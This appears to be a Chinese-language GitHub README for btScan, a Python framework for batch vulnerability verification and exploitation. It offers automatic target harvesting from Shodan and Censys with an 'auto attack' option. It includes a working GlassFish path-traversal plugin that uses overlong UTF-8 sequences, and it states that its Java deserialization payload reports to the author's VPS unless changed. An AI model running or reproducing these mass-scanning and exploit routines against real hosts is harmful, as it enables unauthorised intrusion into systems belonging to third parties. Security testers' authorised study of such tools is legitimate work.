he1m4n6a/btScan
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
btScan/README.md
he1m4n6a 6a307788cf Update README.md
2018-04-18 11:18:27 +08:00

91 lines
3.3 KiB
Markdown
Executable File
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 目录结构
--lib 核心文件库
--report 报告生成的文件夹
--node 里面每一个py文件是一个攻击向量添加扫描节点也是向里面添加文件
--crawl 通过空间搜索引擎抓取url或者ip的脚本
## 使用方法
python btScan.py
usage: btScan.py [options]
* batch vulnerability verification and exploition framework. *
By he1m4n6a
optional arguments:
-h, --help show this help message and exit
-t THREADS Num of scan threads for each scan process, 20 by default
-m MODE select mode [config|script]
e.g. -m script
-n NAME from node floder choose a script
-c COMMAND give an instruction when use script mode [verify|exploit]
e.g. -c verify
-u URL_FILE input url file
-i IP_FILE input ip file
-autoIP get ip from space search engine and auto attack
-autoURL get url from space search engine and auto attack
-v show program's version number and exit
脚本存在两种验证模式一种是通过加载模块另一种是通过配置文件。复杂的可以通过加载脚本简单的通过加载配置文件即可。然后攻击也有两种模式验证verify模式和攻击exploit模式。 你也可以指定ip或者url作为输入格式也可以自动获取ip或者url那就是配合crawl文件下的网络空间抓取模块。
**示例**
```
python btscan.py -n joomla -m script -c verify -u url.txt
-n 指定node文件夹下的joomla.py-m指定为script模式即指定加载模块的模式。-c指定模式为验证仅为验证就好了-u指定输入为url的模式。
```
```
python btscan.py -n joomla -m script -c exploit -u url.txt
同上,只是指定为攻击模式。
```
```
python btscan.py -m config -c verify -i ip.txts
-m指定为config模式-c指定为验证模式-i指定输入的为ip模式仅需通过conf目录下的scan_rule.ini的配置就够了。
```
## 插件编写规则
仅需要在node文件夹下新增一个py文件
py文件中重要的有两个函数verify和exploit函数没有exploit攻击模式仅需要verify函数返回值有三个值第一个值是返回是否存在漏洞返回True或者False第二个值是返回url第三个值返回需要打印的信息。
***示例(glassfish.py为例)***
```
#!/usr/bin/env python
#coding=utf8
import requests
def verify(ip):
url = 'https://' + str(ip) + ':4848//theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/'
try:
r = requests.get(url, verify=False, timeout=5)
if 'ejb-timer-service-app' in r.text:
msg = 'vul'
return True, ip, msg
else:
msg = 'safe'
return False, ip, msg
except Exception, e:
#msg = str(e)
msg = 'safe'
return False, ip, msg
def exploit(ip):
verify(ip)
```
上面函数都可以自己定义主要是verfiy和exploit函数如果exploit函数和verify函数一样exploit函数里面只要简单的调用verify(url)即可。
## 其他
crwal文件夹的NetSearch.py里面的shadon和censys模块的密钥要自己填上。
java反序列化的payload要自行更改不然结果是发送到我的vps上。
有任何交流和问题可以联系我he1m4n6a@163.com
Reference in New Issue View Git Blame Copy Permalink